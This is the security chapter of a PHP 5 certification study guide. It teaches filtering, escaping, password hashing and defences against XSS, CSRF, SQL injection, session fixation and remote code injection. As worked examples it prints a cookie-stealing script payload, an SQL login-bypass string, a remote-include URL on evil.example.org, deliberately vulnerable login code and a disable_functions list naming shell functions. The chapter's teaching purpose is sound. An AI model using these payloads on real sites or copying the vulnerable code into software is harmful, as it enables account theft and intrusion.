Security - Zend PHP 5 Certification Study Guide (2014)

Zend PHP 5 Certification Study Guide (2014)

Security

Ben Parker once advised his young nephew Peter, whose superhero alter ego is Spiderman, that “with great power comes great responsibility.” So it is with security in PHP applications. PHP provides a rich toolset with immense power—perhaps too much power, some have argued—and this power, when used with careful attention to detail, allows for the creation of complex, robust applications. Without attention to detail, though, malicious users can turn PHP’s power to their advantage, attacking applications in a variety of ways. This chapter examines some of these attack vectors, providing you with the means to mitigate and even eliminate most attacks.

It is important to understand that this chapter does not provide an exhaustive coverage of all the security topics PHP developers must be aware of. This is, as we mentioned in the foreword, true of all chapters in this book, but we think it’s worth a reminder here because of the potentially serious consequences of security-related bugs.

Concepts and Practices

Before analyzing specific attacks and how to protect against them, it is necessary to have a grasp of some basic principles of Web application security. These principles are not difficult to understand, but they require a particular mindset about data: simply put, a security-conscious mindset assumes that all data received in input is tainted and must be filtered before use and escaped when leaving the application. Understanding and practicing these concepts is essential to ensure the security of your applications. Before analyzing specific attacks and how to protect against them, it is necessary to have a grasp of some basic principles of Web application security. These principles are not difficult to understand, but they require a particular mindset about data: simply put, a security-conscious mindset assumes that all data received in input is tainted and must be filtered before use and escaped when leaving the application. Understanding and practicing these concepts is essential to ensure the security of your applications.

The main thing to remember is FIEO: Filter Input, Escape Ouput.

All Input is Tainted

Perhaps the most important concept in any transaction is that of trust. Do you trust the data being processed? Can you? The answer is easy if you know the origin of the data. But if the data originates from a foreign source, such as user form input, a query string, or even an RSS feed, it cannot be trusted. It is tainted data.

Data from these sources—and many others—is tainted because you cannot be certain that it does not contain characters that might be executed in the wrong context. For example, a query string value might contain data that was manipulated by a user to include Javascript that, when echoed to a web browser, will have harmful consequences.

As a general rule of thumb, the data in all of PHP’s superglobal arrays should be considered tainted. This is because either all or some of the data provided in the superglobal arrays comes from an external source. Even the $_SERVER array is not fully safe, because it contains some data provided by the client. The one exception to this rule is the $_SESSION array, which is persisted on the server and never transmitted over the Internet.

Furthermore, data from any external source, for example a web service, should also be treated as input, even though it is fetched rather than pushed by the user.

Before processing tainted data, it is important to filter it. The data is only safe to use once it is filtered. There are two approaches to filtering data: the whitelist approach and the blacklist approach.

Whitelist vs. Blacklist Filtering

Two common approaches to filtering input are whitelist filtering and blacklist filtering. Blacklist filtering is the less restrictive approach; it assumes the programmer knows everything that should not be allowed to pass through. For example, some forums filter profanity using a blacklist approach. There is a specific set of words that are considered inappropriate for that forum, and these words are filtered out. Any word that is not in that list is allowed. Thus, it is necessary to add new words to the list from time to time, as moderators see fit. This example may not directly correlate to the specific problems faced by programmers attempting to mitigate attacks, but there is an inherent problem in blacklist filtering that is evident here: blacklists must be continually modified and expanded as new attack vectors become apparent.

Whitelist filtering is much more restrictive, but it affords the programmer the ability to accept only expected inputs. Instead of identifying data that is unacceptable, a whitelist identifies the data that is acceptable. Any inputs not on the whitelist will be rejected. This is information you already have when developing an application; it may change in the future, but you maintain control over the parameters that change and are not left to the whims of would-be attackers. Since you control what data you accept, attackers are unable to pass any inputs other than what your whitelist allows. For this reason, whitelists afford stronger protection against attacks than blacklists do.

Validation

Since all input is tainted and cannot be trusted, you must validate your input to ensure that it is what you expect. To do this, we use validation, or a whitelist approach. As an example, consider the following HTML form:

Listing 13.1: A sample HTML form

<form method="POST">

Username: <input type="text" name="username">

<br>

Password: <input type="text" name="password">

<br>

Favourite colour:

<select name="colour">

<option>Red</option>

<option>Blue</option>

<option>Yellow</option>

<option>Green</option>

</select>

<br>

<input type="submit">

</form>

This form contains three input elements: username, password, and color. For this example, username should contain only alphabetic characters, password should contain only alphanumeric characters, and color should contain any of “Red,” “Blue,” “Yellow,” or “Green.” It is possible to implement client-side validation code using JavaScript to enforce these rules, but, as described later in the section on spoofed forms, it is not always possible to force users to use only your form and, thus, your client-side rules. Therefore, while client-side validation is important for usability, server-side filtering is important for security.

To filter the input received from this form, start by initializing a blank array. It is important to use a name that sets this array apart as containing only filtered data; in this example, we use $clean. Then, later in your code, when you encounter the variable $clean['username'], you can be certain that this value has been filtered. If, however, you see $_POST['username'], you cannot be certain that the data is trustworthy. Discard these variables and use the ones from the $clean array instead.

Validation can take one of two forms; the first is comparison against known good values, and the second is confirmation of content.

To perform comparisons against known good values, we typically define an array of possible inputs and check for the presence of the input value within it. For confirmation of content, we can use ctype_* functions such as ctype_alpha() and ctype_digit().

The following code example shows one way to filter the input for this form:

Listing 13.2: Filtering form input

$clean = array();

if (ctype_alpha($_POST['username'])) {

$clean['username'] = $_POST['username'];

}

if (ctype_alnum($_POST['password'])) {

$clean['password'] = $_POST['password'];

}

$colours = array('Red', 'Blue', 'Yellow', 'Green');

if (in_array($_POST['colour'], $colours)) {

$clean['colour'] = $_POST['colour'];

}

Filtering with the validation approach places the control firmly in your hands and ensures that your application will not receive bad data. If, for example, someone tries to pass to the processing script a username or color that is not allowed, the worst that can happen is that the $clean array will not contain a value for username or color. If username is required, then simply display an error message to the user asking him or her to provide correct data. You should force the user to provide correct information rather than trying to sanitize it on your own. If you attempt to sanitize the data, you may end up with bad data, and you’ll run into the same problems that arise with the use of blacklists.

Escape Output

Output is anything that leaves your application bound for a client. The client, in this case, is anything from a Web browser to a database server, and just as you should filter all incoming data, you should escape all outbound data. Whereas filtering input protects your application from bad or harmful data, escaping output protects the client and user from potentially damaging commands.

Escaping output should not be regarded as part of the filtering process, however. These two steps, while equally important, serve distinct purposes. Filtering ensures the validity of data coming into the application; escaping protects you and your users from potentially harmful attacks. Output must be escaped because clients—Web browsers, database servers, and so on—often take action when encountering special characters. For Web browsers, these special characters form HTML tags; for database servers, they may include quotation marks and SQL keywords. We will look at these attacks later in the chapter.

Therefore, it is necessary to know the intended destination of output and to escape the data accordingly. Escaping output intended for a database will not work when sent to a web browser. Since most PHP applications deal primarily with the Web and databases, this section will focus on escaping output for these mediums, but you should always be aware of the destination of your output, and any special characters or commands that destination may accept and act upon, and be ready escape those characters or commands appropriately.

To escape output intended for a web browser, PHP provides htmlspecialchars() and htmlentities(), the latter being the most exhaustive and, therefore, recommended function for escaping. The following code example illustrates the use of htmlentities() to prepare output for sending to the browser. Another concept illustrated is the use of an array specifically designed to store output. If you prepare output by escaping it and storing it to a specific array, you can then use the contents of the array without worrying about whether the output has been escaped. A variable in your script that is being outputted and is not part of this array should be regarded suspiciously. This practice will help make your code easier to read and maintain. For this example, assume that the value for $user_message comes from a database result set.

$html = array();

$html['message'] = htmlentities(

$user_message, ENT_QUOTES, 'UTF-8'

);

echo $html['message'];

Escape output intended for a database server, such as in an SQL statement, with the database-driver-specific *_escape_string() function; when possible, use prepared statements. Since PHP 5.1 includes PHP Data Objects (PDO), you may use prepared statements for all database engines for which there is a PDO driver. If the database engine does not natively support prepared statements, then PDO emulates this feature transparently for you.

The use of prepared statements allows you to specify placeholders in an SQL statement. This statement can then be used multiple times throughout an application, substituting new values for the placeholders, each time. The database engine (or PDO, if it is emulating prepared statements) performs the hard work of actually escaping the values for use in the statement. The Database Programming chapter contains more information on prepared statements, but the following code provides a simple example for binding parameters to a prepared statement.

Listing 13.3: Using prepared statements to escape values

// First, filter the input

$clean = array();

if (ctype_alpha($_POST['username'])) {

$clean['username'] = $_POST['username'];

// Set a named placeholder in the SQL statement

$sql = 'SELECT * FROM users WHERE username = :username';

// Assume the handler exists; prepare the statement

$stmt = $dbh->prepare($sql);

// Create our data mapping

$data = [':username' => $clean['username']];

// Execute and fetch results

$stmt->execute($data);

$results = $stmt->fetchAll();

}

Filtering

Another option is filtering. Filtering is both validation and sanitization of input. Validation confirms that the input is what we expect, while sanitization will clean a string by either escaping or removing offending parts. Often we want to do both.

PHP 5.2 added a new filter extension that allows much more control over validation, as well as the ability to do some common escaping. For example, the filter extension allows us to not only define that we want to string, but that the string should be an email address or a URL for example.

The filter extension provides two primary functions. The first is filter_input(), which is recommended for working explicitly with input via $_GET, $_POST, $_SERVER, $_COOKIE, $_SERVER, and $_ENV. This allows you to easily search through your code for unfiltered input. The filter_input() method accepts 4 arguments:

1. The type of input, which is one of the constants

· INPUT_GET

· INPUT_POST

· INPUT_COOKIE

· INPUT_SERVER

· INPUT_ENV

2. The variable name, which is what would be the array key of the superglobal array

3. The filter to apply

4. Filter options

The second function is filter_var(), which will filter any variable (or constant expression), including those in the superglobal arrays (although choosing to filter individual values and expressions will make verifying security more difficult). This is very similar to filter_input() except that it only takes three arguments:

1. The value to filter

2. The filter to apply

3. Filter options

There are two types of filters that can be applied, validation and sanitizing. You can also define a callback. A full list of filters and options can be found in Appendix B.

All filters are defined by a constant; validation filters are named FILTER_VALIDATION_* and sanitizing filters are named FILTER_SANITIZE_*. Flags, appropriately, are named FILTER_FLAG_*.

All filters return the—potentially sanitized—value, or false on failure. This can be tricky when validating booleans using FILTER_VALIDATE_BOOLEAN, as it will also return false when the input is false. To get around this, the flag FILTER_NULL_ON_FAILURE will return null on failure rather than false.

Using these functions is simple. Here is what it might look like to filter our form from earlier:

Listing 13.4: Using filter_* to validate and sanitize data

// First, filter the input

$clean = array();

// Validate it's just a string

$username = filter_input(

INPUT_POST,

'username',

FILTER_VALIDATE_REGEXP,

['options' =>

['regexp' => '/^[a-z]$/i']

]

);

// If validation failed, $username will be false

if ($username) {

$clean['username'] = $username;

} else {

// Validation failed, prepare the input for re-output to

// the user in HTML

$clean['username'] = filter_input(

INPUT_POST, 'username', FILTER_SANITIZE_SPECIAL_CHARS

);

}

The filter extension is the recommended way to handle input.

You can also filter multiple values in one go using filter_input_array() and filter_var_array().

If we want to strip tags from all POST values, or maybe a row of data from our database, we can do so very simply:

$clean = filter_input_array(

INPUT_POST, FILTER_SANITIZE_STRING

);

// or

$clean = filter_var_array($row, FILTER_SANITIZE_STRING);

We can also specify different filters for each input value:

Listing 13.5: Specifying different filters

$clean = filter_input_array(

INPUT_POST,

[

'email' => FILTER_VALIDATE_EMAIL,

'blog' => FILTER_VALIDATE_URL,

'age' => [

'filter' => FILTER_VALIDATE_INT,

'options' => ['min_range' => 18]

]

]);

Be aware that FILTER_VALIDATE_URL only allows ASCII domains; internationalized domain names (IDN) must first be converted to punycode using idn_to_ascii(). Additionally, a valid URL does not necessarily mean that it uses the HTTP scheme; you should validate the scheme usingparse_url().

PHP 5.4 also introduced an additional argument to both functions, add_empty, which when set to true will add keys missing from the input array to the result array with a value of NULL.

Register Globals

As of PHP 5.3 register_globals has been deprecated, and it was removed entirely in PHP 5.4.

Password Security

With PHP 5.5, a new, simple password-hashing API was added to help ensure that best practices are used by everyone. The password-hashing API currently promotes bcrypt one-way hashing as the best algorithm; it is far superior to MD5, and even SHA-1.

Hashing Passwords

Hashing a password is as simple as calling the password_hash() function with the string to hash and the algorithm to use:

$hashed = password_hash("password", PASSWORD_BCRYPT);

echo $hashed;

Which produces output similar to:

$2y$10$zEsiam6Y6rlCGqGgS3lrve8FaeWruKJY3ElaeQUJRhEyhWOQ7ySqO

As you can see, we pass in the PASSWORD_BCRYPT constant to choose the bcrypt algorithm. While this is currently the only algorithm, the API was built under the assumption that it would either be improved upon with a different algorithm or compromised. The API provides simple mechanisms for ensuring your passwords are kept up to date.

It is also possible to pass extra options to password_hash() by passing an associative array as the third argument. These options are:

· salt — You may provide a custom salt which will override the automatically generated salts. This is not recommended.

· cost — The cost denotes the algorithmic cost that should be used—the higher this number, the slower, and the better your security. The default is 10. You should be aiming for a hash time of between one-half and one second.

$hashed = password_hash(

"password", PASSWORD_BCRYPT, ['cost' => 12]

);

echo $hashed;

Displays something similar to the following:

$2y$12$AGzXqsGLuHSXhW4nCzC6NeZauf.hrWoBJpNn/Q4pr9phL0BNvMIOa

Verifying Passwords

To verify a password, we use the password_verify() function. This is even simpler than hashing the password. It takes the user input, and the saved hash, and returns a boolean. This is possible because the resulting hash from password_hash() includes the algorithm, cost, and salt.

// Assume $hashed contains the originally stored password

if (password_verify($_POST['password'], $hashed)) {

// Password is valid

}

Forward Compatibility

As computing hardware gets faster, hashing algorithms become more susceptible to brute force attacks. Additionally, flaws can be found in the algorithm that render it insecure.

To help with this, the API also provides a the password_needs_rehash() function. This function takes the hashed password as its first argument, and then as with password_hash(), the algorithm and (optional) options as its second and third arguments.

To further ease this process, PHP provides a PASSWORD_DEFAULT constant, that is set to the current recommended algorithm. This means that when you create a password, it uses the most up-to-date option every time. This is possible because password_verify() uses the algorithm indicated in the hash itself.

By combining this function with your verification process, you can automatically update your users’ passwords when new algorithms become available.

Listing 13.6: Upgrading user password transparently

// Assume $hashed contains the originally stored password

if (password_verify($_POST['password'], $hashed)) {

// Password is valid

if (password_needs_rehash($hashed, PASSWORD_DEFAULT)) {

$newhash = password_hash(

$_POST['password'], PASSWORD_DEFAULT

);

// Store the $newhash

}

}

This can allow you to upgrade your users in place without inconveniencing them with a mass password reset. After a set period of time, say 30 days, you can reset the passwords of users who are still failing password_needs_rehash() to migrate inactive users and ensure security.

Website Security

Website security refers to the security of the elements of a website through which an attacker can interface with your application. These vulnerable points of entry include forms and URLs, which are the most likely candidates for a potential attack. Thus, it is important to focus on these elements and learn how to protect against the improper use of your forms and URLs. Proper input filtering and output escaping will mitigate most of these risks.

Spoofed Forms

A common method used by attackers is a spoofed form submission. There are various ways to spoof forms, the easiest of which is to simply copy a target form and execute it from a different location. Spoofing a form makes it possible for an attacker to remove all client-side restrictions imposed upon the form, allowing any and all manner of data to be submitted to your application. Consider the following form:

Listing 13.7: Form with maxlength restrictions

<form method="POST" action="process.php">

<p>

Street: <input type="text" name="street"

maxlength="100">

</p>

<p>

City: <input type="text" name="city" maxlength="50">

</p>

<p>

State:

<select name="state">

<option value="">Pick a state...</option>

<option value="AL">Alabama</option>

<option value="AK">Alaska</option>

<option value="AR">Arizona</option>

<!-- options continue for all 50 states -->

</select>

</p>

<p>

Zip: <input type="text" name="zip" maxlength="5">

</p>

<p>

<input type="submit">

</p>

</form>

This form uses the maxlength attribute to restrict the length of content entered into the fields. There may also be some JavaScript validation that tests these restrictions before submitting the form to process.php. In addition, the select field contains a set list of values, as defined by the form. It’s a common mistake to assume that these are the only values that the form can submit. However, it is possible to reproduce this form at another location and submit it by modifying the action to use an absolute URL. Consider the following version of the same form:

Listing 13.8: Tampered form without maxlength restrictions

<form method="POST" action="http://example.org/process.php">

<p>

Street: <input type="text" name="street">

</p>

<p>

City: <input type="text" name="city">

</p>

<p>

State: <input type="text" name="state">

</p>

<p>

Zip: <input type="text" name="zip">

</p>

<p>

<input type="submit">

</p>

</form>

In this version of the form, all client-side restrictions have been removed, and the user may enter any data, which will then be sent to http://example.org/process.php, the original processing script for the form.

As you can see, spoofing a form submission is very easy—and it is also virtually impossible to protect against. You may have noticed, though, that it is possible to check the REFERER header within the $_SERVER superglobal array. While this may provide some protection against an attacker who simply copies the form and runs it from another location, even a moderately crafty hacker will be able to circumvent it fairly easily. Suffice to say that, since the Referer header is sent by the client, it is easy to manipulate, and its expected value is always apparent: process.php will expect the referring URL to be that of the original form page.

Despite the fact that spoofed form submissions are hard to prevent, it is not necessary to deny data submitted from sources other than your forms. It is necessary, however, to ensure that all input plays by your rules. This reiterates the importance of filtering all input. Do not rely upon client-side validation techniques. Filtering input ensures that all data conforms to a list of acceptable values, and spoofed forms will not be able to get around server-side filtering rules.

Cross-Site Scripting

Cross-site scripting (XSS) is one of the most common and best known kinds of attacks. The simplicity of this attack and the number of vulnerable applications in existence make it very attractive to malicious users. An XSS attack exploits the user’s trust in the application; it is usually an effort to steal user information, such as cookies and other personally identifiable data. All applications that display input are at risk.

Consider the following form, for example. This form might exist on any of a number of popular community websites; it allows a user to add a comment to another user’s profile. After submitting a comment, the page displays all of the comments that have been submitted so that everyone can view all of the comments left on the user’s profile.

Listing 13.9: Simple comment form

<form method="POST" action="process.php">

<p>Add a comment:</p>

<p>

<textarea name="comment"></textarea>

</p>

<p>

<input type="submit">

</p>

</form>

Imagine that a malicious user submits a comment on someone’s profile that includes the following content and it is displayed without escaping:

<script>

document.location =

'http://example.org/getcookies.php?cookies='

+ document.cookie;

</script>

Now, everyone visiting this user’s profile will be redirected to the given URL and their cookies (including personally identifiable information and login information) will be appended to the query string. The attacker can easily access the cookies with $_GET['cookies'] and store them for later use. However, this attack works only if the application fails to escape output. Thus, it is easy to prevent with proper output escaping.

Cross-Site Request Forgeries

A cross-site request forgery (CSRF) is an attack that attempts to cause a victim to send arbitrary HTTP requests, usually to URLs requiring privileged access, using the victim’s existing session to gain access. The HTTP request then causes the victim to execute a particular action based on his or her level of privilege, such as making a purchase or modifying or removing information.

Whereas an XSS attack exploits the user’s trust in an application, a forged request exploits an application’s trust in a user, since the request appears to be legitimate and it is difficult for the application to determine whether the user intended for it to take place. While proper escaping of output will prevent your application from being used as the vehicle for a CSRF attack, it will not prevent your application from receiving forged requests. Thus, your application must be able to determine whether the request was intentional and legitimate or possibly forged and malicious.

Before examining the means to protect against forged requests, it may be helpful to understand how such an attack occurs. Consider the following example.

Suppose you have a website at which users register for an account and then browse a catalogue of books for purchase. Suppose that a malicious user signs up for an account and proceeds through the process of purchasing a book from the site. Along the way, she might learn the following through casual observation:

· She must log in to make a purchase.

· After selecting a book for purchase, she clicks the buy button, which redirects her through checkout.php.

· She sees that the action to checkout.php is a POST action but wonders whether passing parameters to checkout.php through the query string (GET) will work.

· When passing the same form values through the query string (i.e. checkout.php?isbn=0312863551&qty=1), she notices that she has, in fact, successfully purchased a book.

With this knowledge, the malicious user can cause others to make purchases at your site without their knowledge. The easiest way to do this is to use an image tag to embed an image in some arbitrary Web site other than your own (although, at times, your own site may be used for such an attack). In the following code, the src of the img tag makes a request when the page loads.

<img src="http://example.org/checkout.php?isbn=0312863551&qty=1" />

Even though this img tag is embedded on a different website, it still continues to make the request to the book catalogue site. For most people, the request will fail because users must be logged in to make a purchase, but for those users who do happen to be logged into the site (through a cookie or an active session), this attack exploits the website’s trust in that user and initiates a purchase. The solution for this particular type of attack, however, is simple: force the use of POST over GET. This attack works because checkout.php uses the $_REQUEST superglobal array to access isbn and qty.

Using $_POST will mitigate the risk of this kind of attack, but it won’t protect against all forged requests. Other, more sophisticated attacks can make POST requests just as easily as GET. A simple token method can block these attempts and force users to use your forms. The token method involves the use of a randomly generated token that is stored in the user’s session when the user accesses the form page and is also placed in a hidden field on the form. The processing script checks the token value from the posted form against the value in the user’s session. If it matches, then the request is valid. If it does not match or is missing, then the request is suspect. The script should not process the input and should instead display an error to the user. The following snippet from the aforementioned form illustrates the use of the token method:

Listing 13.10: Setting a token to prevent CSRF

session_start();

$token = md5(uniqid(rand(), TRUE));

$_SESSION['token'] = $token;

?>

<form action="checkout.php" method="POST">

<input type="hidden" name="token"

value="<?php echo $token; ?>">

<!-- Remainder of form -->

</form>

The processing script that handles this form (checkout.php) can then check for the token:

Listing 13.11: Validating CSRF token

// ensure token is set and that the value submitted

// by the client matches the value in the user's session

if (isset($_SESSION['token'])

&& isset($_POST['token'])

&& $_POST['token'] == $_SESSION['token'])

{

// Token is valid, continue processing form data

}

Database Security

When using a database and accepting input to create part of a database query, it is easy to fall victim to an SQL injection attack. SQL injection occurs when a malicious user experiments on a form or (worse) URL query string to gain information about a database. After gaining sufficient knowledge—usually from database error messages—the attacker can exploit any possible vulnerabilities in the form by injecting SQL into form fields. A popular example is a simple user login form:

Listing 13.12: Sample login form

<form method="login.php" action="POST">

Username: <input type="text" name="username" />

<br />

Password: <input type="password" name="password" />

<br />

<input type="submit" value="Log In" />

</form>

The vulnerable code used to process this login form might look like this:

Listing 13.13: Vulnerable login script

$username = $_POST['username'];

$password = password_hash(

$_POST['password'], PASSWORD_DEFAULT

);

$sql = "SELECT *

FROM users

WHERE username = '{$username}' AND

password = '{$password}'";

/* database connection and query code */

if (count($results) > 0) {

// Successful login attempt

}

In this example, note there is no code to filter the $_POST input. Instead, the raw input is stored directly to the $username variable. This raw input is then used in the SQL statement—nothing is escaped. An attacker might attempt to log in using a username similar to the following:

username' OR 1 = 1 --

With this username and a blank password, the SQL statement is now:

SELECT *

FROM users

WHERE

username = 'username' OR 1 = 1 --' AND

password = '$2y$10$.vGA1O9wmRjrwAVXD98HNOgsNpDczlqm3Jq7KnEd1rVAGv3Fykk1a'

Since 1 = 1 is always true and -- begins an SQL comment, the SQL query ignores everything after the -- and successfully returns all user records. This is enough to log in the attacker. Furthermore, if the attacker knows a username, he can provide that username in an attempt to impersonate the user and gain that user’s access credentials.

SQL injection attacks are made possible by a lack of filtering and escaping. To properly protect your application, use bound parameters with prepared statements. For more information on bound parameters, see the Escape Output section earlier in this chapter or the Database Programmingchapter. If you can’t use prepared statements—and must manually escape the output—use either PDO::quote() or use the driver-specific *_escape_string() function for your database.

Session Security

Two popular forms of session attacks are session fixation and session hijacking. Whereas most of the other attacks described in this chapter can be prevented by filtering input and escaping output, session attacks cannot. Instead, it is necessary to plan for them and identify potential problem areas of your application.

Sessions are discussed in the Web Programming chapter.

When a user first encounters a page in your application that calls session_start(), a session is created for the user. PHP generates a random session identifier to identify the user and then sends a Set-Cookie header to the client. By default, the name of this cookie is PHPSESSID, but it is possible to change the cookie name in php.ini or by using the session_name() function. On subsequent visits, the client identifies the user with the cookie, and this is how the application maintains state.

You should always use cookie-based sessions. Although there is a directive, session.use_trans_sid, that instructs PHP to append the session identifier to the URLs of your application, doing so exposes the session identifier. Leave this setting at 0 to disable this behavior.

It is possible, however, to set the session identifier manually through the query string, forcing the use of a particular session. This simple attack is called session fixation because the attacker fixes the session. This is most commonly achieved by creating a link to your application and appending the session identifier that the attacker wishes to give any user clicking the link.

<a href="http://example.org/index.php?PHPSESSID=1234">

Click here

</a>

When the user accesses your site through this session, he may provide sensitive information or even login credentials. If the user logs in while using the provided session identifier, the attacker may be able to “ride” on the same session and gain access to the user’s account. This is why session fixation is sometimes referred to as session riding. Since the purpose of the attack is to gain a higher level of privilege, the points at which the attack should be blocked are clear: every time a user’s access level changes, the session identifier should be regenerated. PHP makes this a simple task with session_regenerate_id().

session_start();

// If the user login is successful, regenerate the session ID

if (authenticate()) {

session_regenerate_id();

}

While this will protect users from having their session fixed and offering easy access to any would-be attacker, it won’t help much against another common session attack known as session hijacking. This is a generic term used to describe any means by which an attacker gains a user’s valid session identifier (rather than providing one of his own).

For example, suppose that a user logs in. If the session identifier is regenerated, she has a new session identifier. What if an attacker discovers this new identifier and attempts to use it to gain access through that user’s session? It is then necessary to use other means to identify the user.

One way to identify the user in addition to the session identifier is to check various request headers sent by the client. One request header that is particularly helpful and does not change between requests is the User-Agent header. Since it is unlikely (at least in most legitimate cases) that a user will change from one browser to another within the same session, this header can be used to determine a possible session hijacking attempt.

After a successful login attempt, store the User-Agent into the session:

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];

Then, on subsequent page loads, check to ensure that the User-Agent has not changed. If it has changed, that is cause for concern, and the user should log in again.

if ($_SESSION['user_agent'] != $_SERVER['HTTP_USER_AGENT'])

{

// Force user to log in again

exit;

}

Filesystem Security

PHP has the ability to access the filesystem directly and even execute shell commands. While this affords developers great power, it can be very dangerous when tainted data ends up in a command line. Again, proper filtering and escaping can mitigate these risks.

Remote Code Injection

When including files with include and require, pay careful attention when using possibly tainted data to create a dynamic include based on client input; otherwise, a mistake could easily allow would-be hackers to execute a remote code injection attack. A remote code injection attack occurs when an attacker is able to cause your application to execute PHP code of his choosing. This can have devastating consequences for both your application and your system.

For example, many applications make use of query string variables such as: http://example.org/?section=news to structure the application into sections. One such application may use an include statement to include a script to display the “news” section:

include "{$_GET['section']}/data.inc.php";

When using the proper URL to access this section, the script will include the file located at news/data.inc.php. However, consider what might happen if an attacker modified the query string to include harmful code located on a remote site. The following URL illustrates how an attacker can do this:

http://example.org/?section=http%3A%2F%2Fevil.example.org%2Fattack.inc%3F

Now, the tainted section value is injected into the include statement, effectively rendering it as:

include "http://evil.example.org/attack.inc?/data.inc.php";

The application will include attack.inc, located on the remote server, which treats /data.inc.php as part of the query string, thus effectively neutralizing its effect within your script. Any PHP code contained in attack.inc is executed and run, causing whatever harm the attacker intended.

While this attack is very powerful, effectively granting the attacker all the privileges enjoyed by the Web server, it is easy to protect against it by filtering all input and never using tainted data in an include or require statement. In this example, filtering might be as simple as specifying a certain set of expected values for section:

Listing 13.14: Vulnerable include script

$clean = array();

$sections = array('home', 'news', 'photos', 'blog');

if (in_array($_GET['section'], $sections)) {

$clean['section'] = $_GET['section'];

} else {

$clean['section'] = 'home';

}

include $clean['section'] . "/data.inc.php";

The allow_url_fopen directive in PHP provides the feature by which PHP can access URLs, treating them like regular files, thus making an attack like the one described here possible. By default, allow_url_fopen is set to On; however, it is possible to disable it in php.ini, setting it to Off, which will prevent your applications from including or opening remote URLs as files (as well as effectively disallowing many of the cool stream features described in the Files and Streams chapter).

The allow_url_include directive can enable or disable the use of URL with include, include_once, require, and require_once. By default it is set to Off. If you want to use allow_url_fopen, you can disable allow_url_include to mitigate remote code execution.

Command Injection

Just as allowing client input to dynamically include files is dangerous, so is allowing the client to affect the use of system command execution without strict controls. While PHP provides great power with the exec(), system(), and passthru() functions, as well as the ` (backtick) operator, these must not be used lightly, and it is important to take great care to ensure that attackers cannot inject and execute arbitrary system commands. Again, proper filtering and escaping will mitigate the risk—a whitelist filtering approach that limits the number of commands that users may execute works quite well here. Also, PHP provides escapeshellcmd() and escapeshellarg() as a means to properly escape shell output.

When possible, avoid the use of shell commands. If they are necessary, avoid the use of client input to construct dynamic shell commands.

Shared Hosting

There are a variety of security issues that arise when using shared hosting solutions. In the past, PHP has tried to resolve some of these issues with the safe_mode directive. However, as the PHP manual states, it “is architecturally incorrect to try to solve this problem at the PHP level.” Thus,safe_mode will no longer be available as of PHP 6.

Still, there are three php.ini directives that remain important in a shared hosting environment: open_basedir, disable_functions, and disable_classes. These directives do not depend upon safe_mode, and they will remain available for the foreseeable future.

The open_basedir directive provides the ability to limit the files that PHP can open to a specified directory tree. When PHP tries to open a file with, for example, fopen() or include, it checks the the location of the file. If it exists within the directory tree specified by open_basedir, then it will succeed; otherwise, it will fail to open the file. You may set the open_basedir directive in php.ini or on a per-virtual-host basis in httpd.conf. In the following httpd.conf virtual host example, PHP scripts may only open files located in the /home/user/www and /usr/local/lib/php directories (the latter is often the location of the PEAR library):

<VirtualHost *>

DocumentRoot /home/user/www

ServerName www.example.org

<Directory /home/user/www>

php_admin_value open_basedir "/home/user/www/:/usr/local/lib/php/"

</Directory>

</VirtualHost>

The disable_functions and disable_classes directives work similarly, allowing you to disable certain native PHP functions and classes for security reasons. Any functions or classes listed in these directives will not be available to PHP applications running on the system. You may only set these inphp.ini. The following example illustrates the use of these directives to disable specific functions and classes:

; Disable functions

disable_functions = exec,passthru,shell_exec,system

; Disable classes

disable_classes = DirectoryIterator,Directory

Summary

This chapter covered some of the most common attacks faced by Web applications and illustrated how you can protect your applications against some of their most common variations—or, at least, mitigate their occurrence.

Despite the many ways your applications can be attacked, four simple words can sum up most solutions to Web application security problems: filter input, escape output. Implementing these security best practices will allow you to make use of the great power provided by PHP, while reducing the power available to potential attackers. However, the responsibility is yours.